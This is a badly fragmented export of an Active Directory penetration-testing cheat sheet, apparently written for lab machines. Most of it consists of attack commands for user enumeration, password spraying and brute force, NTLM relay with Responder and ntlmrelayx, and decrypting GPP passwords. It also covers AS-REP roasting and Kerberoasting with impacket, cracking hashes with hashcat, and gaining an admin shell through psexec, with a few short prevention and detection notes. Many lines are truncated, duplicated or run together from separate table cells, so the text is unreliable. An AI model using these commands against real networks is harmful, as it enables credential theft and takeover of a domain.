Summary

This document has the brief overviwe of Active Directory labs solve
techniques
Sno
1
2

4
LDAP Enum
6
7
SMB Enum
8
9

10

Kerberos En
11
12
Extract GPOs
13
14
CrackMapExec and Ker

15

16
Enumerate list of valid users o

17

18
use LDAP exe on Windows which will check whether an
this can be done even on CLI Co
ldapsearch -LL -x -H ldap://dc1.<target-dom
Check for null session enabled (Null session is nothing but
18

19

Password brute force for Iden

20

ropnop kerbrute Which that will do an U

21

22

23
Event ID 4771 will generate the Alert that Kerberos Pre-Authentication Fail
ADRecon.ps1 - Complete Tool fo
 Objective
Discover open ports and services on the network.
Identify the domain controller.
Verify Domain Controller:
Using nslookup (DNS Records)
Using PowerShell (For Domain controller verifying)
LDAP Enumeration
Using ldapsearch (Linux)
Using AD Explorer (Windows)
SMB Enumeration
Using smbclient
For brute-forcing the SMB

Using rpcclient

Kerberos Enumeration
Find valid usernames for brute force
Verify SPNs (Service Principal Names)
Extract GPOs and Shares
Group Policy Enumeration
Shared Folders Enumeration (Windows)
CrackMapExec and Kerbrute for Automation

CrackMapExec for a wide AD recon

Kerbrute for username brute force

Enumerate list of valid users on AD using nmap co
Now enumerating the local names of the user using Nmap
script with the above user's list which we got.

Which will give you valid or not valid user's for Kerberos
Authentication
Same using metasploit
use LDAP exe on Windows which will check whether anonymous login is en
this can be done even on CLI Command on Kali Linux
ldapsearch -LL -x -H ldap://dc1.<target-domain-name> -b ' ' -s b
Check for null session enabled (Null session is nothing but logging into the syst
using enum4linux

Using rpcclient

Password brute force for Identified users on AD A

Using Metasploit

ropnop kerbrute Which that will do an User Enum and also th

 ropnop For User Enumration

Password Spray with ropnop tool

Brute Force (With combined Username and Password

Event ID 4771 will generate the Alert that Kerberos Pre-Authentication Failed" to admin's So, ad
ADRecon.ps1 - Complete Tool for Active Directory Re
 Command
nmap -sS -p 135,389,445,636,3268,3269,53,88 <IP Address>
nmap -sV --script ldap-rootdse -p 389 <IP Address>

nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>

Get-ADDomainController -Discover -DomainName <domain>

LDAP Enumeration
ldapsearch -x -H ldap://<IP Address> -b "dc=example,dc=com"
Use GUI to query the AD database.
SMB Enumeration
smbclient -L //<IP Address> -U ""
crackmapexec smb <IP Range> -u <user> -p <password>
rpcclient -U "" <IP Address>
enumdomusers
enumalsgroups
Kerberos Enumeration
[Link] <domain>/<username> -request
[Link] <domain>/<username> -dc-ip <IP>
Extract GPOs and Shares
[Link] -d <domain> -u <user> -p <password>
net share
apExec and Kerbrute for Automation
crackmapexec smb <IP Range> --shares
crackmapexec smb <IP Range> --users
kerbrute userenum -d <domain> [Link] -t 5
of valid users on AD using nmap command

nmap -p 88 --script=krb5-enum-users --script-args ="krb5-enum-

users".realm='[Link]',userdb=sample_users.txt"
<domain_ip>

module: auxiliary/gather/kerberos_enumusers
eck whether anonymous login is enabled on the LDAP Server or not
even on CLI Command on Kali Linux which is:
c1.<target-domain-name> -b ' ' -s base '(objectclass=*)'
is nothing but logging into the system without username and password)
enum4linux -a <AD-IP>
rpcclient -U "" -N <ad-ip.>
rpcclient -U "<domain><username>" <ad-ip>
te force for Identified users on AD Aspects
module:
auxiliary/scanner/smb/smb_login
hat will do an User Enum and also the Password Spray
 ./kerbrute_linux_amd64 userenum -d [Link]
[Link]
./kerbrute_linux_amd64 passwordspray -d [Link]
domain_users.txt Password123
cat [Link] | ./kerbrute -d [Link] bruteforce -
hentication Failed" to admin's So, admins can able to see someone is doing wrong things
omplete Tool for Active Directory Recon Part
 Status

ot

sword)
e is doing wrong things
 Sno Topic Name

1 What is NTML Relay Attack

2 How do NTBS and LLMNR work?

Steps to do NTM
Running Responder on the attacker’s
1
machine:

2 How NTLM Relay attack works?

In this case, the Responder program (still deployed on our machine) will be use
relayed to a target service
NTLM relay on
To attack the network’s SMB services, we
modify the configuration file of the
1
Responder program so that it does not start
its SMB server.
2 Identifying vulnerable SMB services
Launching Ntlmrelayx
1 command

By default, Ntlmrelayx opens a socks

service on port 1080 of the “localhost”
2 interface. So, we need to modify the
proxychains configuration so that it
interacts with this port.

To do this, we apply the following

3
configuration:

Now we are ready to start th

Blog Link --> [Link]
How to prevent NT
To prevent NTLM relay attacks, it is possible
1 to counter each of the methods used to
obtain a NET-NTLM hash:

The most effective way of countering the

2 relay is to implement these actions on the
servers.
 Key Notes
NTLM relay attacks allow attackers to sit between clients and servers and relay validated
requests in order to access network services

1. These two protocols have been implemented by Windows. LLMNR is the successor to Ne
reasons of backward compatibility, both have been enabled by default since Window

2. Their purpose is to supplement the DNS protocol when it fails to resolve an addres
difference is that their queries are not sent to a specific server (DNS server) but are broa
subnet. This enables automatic discovery but also allows any machine on the subnet to re
requests.

Steps to do NTML Relay Attack

sudo responder -I eth0 (or <specific Interface> where attacker is connected>

loyed on our machine) will be used only as an LLMNR poisoning tool and all incoming connection re
relayed to a target service (NTLM-compatible service).
NTLM relay on SMB services

nano /etc/responder/[Link]

crackmapexec smb —gen-relay-list smb_targets.txt [Link]/24

Launching Ntlmrelayx against target services
 [Link] -socks -smb2support -tf smb_targets.txt
(The “socks” parameter is used to instruct the tool to store retrieved sessions in a proxy
on the attacker’s machine.)

sudo nano /etc/[Link]

Now we are ready to start the attack again on responder

[Link]/blog/understanding-ntlm-authentication-and-ntlm-relay-attacks/#ntlmv1
How to prevent NTLM Relay Attacks?
1. Disable LLMNR/NETBIOS protocol(s),
2. Disable all Microsoft services vulnerable to coerced attacks,
3. Set up a static ARP table, etc.
1. Disable NTLM authentication on your network and delegate it solely to Kerberos if
2. Enable signing on SMB and LDAP.
3. The HTTPS protocol does not support signing. You can therefore disable the NTLM prot
services specifically, or you can use EPA (Extended Protection Authentication) protection
protection adds a signature to protocols that are not implemented.
 Blue color for heading
White Color for Command and steps
Orange color for tips

First of all always start with the file shares available on Targeted IP Address
smbmap -H <target_IP>

Now check the access and run it accordingly. Now to list all the files and folders we need to run the below co

smbclient -L //<target_ip>/<target-filename> -c 'recurse;ls'

Now next we need to try for manual trying method for smb login
Login into SMB server anonymously: smbclient //<target-ip>/file-share-name
just click enter wihtout entering the password
Always if we are into the smbserver we need to each and every file to check any passwords are in or n
Now we will be getting one hash value from the [Link] file first we need to decrypt the file.
gpp-decrypt <hash-value>

Now with the username and password that have in the [Link] [Link] check what access we have over

smbmap -u <target_usename> -p <password> -H <target_IP>

Now once done we will be trying to get the TGT for the target user using impacket command below
impacket-GetNPUsers -dc-ip <domain-controller-ip> [Link]/<username> -no-pass
Tool number 2 for same attack above
impacket-GetUserSPN --dc-ip <ip> [Link]/<target_username>:<password_got_from_group_policy
Now mostly when we run the above command sure we will be having the time error update which that we need to run th
rectify that
sudo nptdate <target-dc-ip>
once done run the TGT Ticket attack above again then ticket is boom!!!!!
Now save the hash on one file and we need to do a hashcat to decrypt the hash of TGT
We Can do pass the hash attack also refer Pass The Hash attack sheet on same sheet
hashcat -m 13100 <hash_file.txt> -a <wordlist_file>

Now once password is got now we will be getting an shell from the target admin's account to check what are all file s

smbmap -u Administrator -p <admin-password> -H <target_ip>

Now we will be getting into admin's system by impacket command below
impacket-psexec <[Link]/htb>/Administrator@<target-IP>
Click Enter
Now Enter the admin's password
That's all we are into the Admin's Machine
Kerborasting Attack
 Blue color for heading
White Color for Command and steps
Orange color for tips

First we need list of user accounts which that was been on active directory using user enu
below command
nmap -p 88 --script=krb5-enum-users --script-args ="krb5-enum users".realm='[Link]',userdb
<domain_ip>
Now we need to run the below impacket script to get the pre-athentication attack on ac
impacket-GetNPUsers <user_name_got>/ -no-pass -usersfile got_valid_north.txt
Now we need to extract or find the real password from the password hash
hashcat -m 18300 --force -a 0 <password_file.txt> [Link]
How to Fix this Vulnerability
Need to enable the checkbox which is "Do not resecure Kerberos Pre-Authentication Att